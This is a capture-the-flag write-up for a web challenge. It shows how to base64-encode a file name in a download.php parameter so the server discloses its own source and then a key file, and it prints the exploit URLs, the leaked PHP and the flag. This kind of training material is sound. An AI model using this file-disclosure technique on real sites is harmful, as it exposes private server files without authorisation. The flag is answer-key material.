The page provides download links for two songs:
http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=
http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz
The name of the file to download is passed base64-encoded, so encode download.php the same way to get ZG93bmxvYWQucGhw.
Visit http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw to download download.php itself.
download.php
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>
The source shows that hereiskey.php is also on the allow-list, so download hereiskey.php the same way:
<?php
//flag:nctf{download_any_file_666}
?>
Nanjing University of Posts and Telecommunications CTF platform writeup -- web -- Download~